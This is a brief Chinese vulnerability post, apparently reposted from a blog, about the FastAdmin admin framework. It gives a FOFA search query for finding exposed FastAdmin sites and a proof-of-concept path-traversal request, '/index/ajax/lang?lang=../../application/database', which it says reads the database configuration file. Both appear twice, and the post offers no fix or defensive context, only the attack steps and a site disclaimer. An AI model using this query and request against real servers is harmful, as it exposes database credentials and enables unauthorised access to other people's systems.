漏洞描述
FastAdmin是一个基于ThinkPHP5和Bootstrap的后台开发框架,支持权限管理、响应式开发、多语言、模块化开发、CRUD和自由可扩展等功能。
漏洞复现
FOFA
body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"
POC
IP+/index/ajax/lang?lang=../../application/database
成功读取数据库文件
FastAdmin是一个基于ThinkPHP5和Bootstrap的后台开发框架,支持权限管理、响应式开发、多语言、模块化开发、CRUD和自由可扩展等功能。
FOFA
body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"
POC
IP+/index/ajax/lang?lang=../../application/database
成功读取数据库文件
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/884513.html
如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!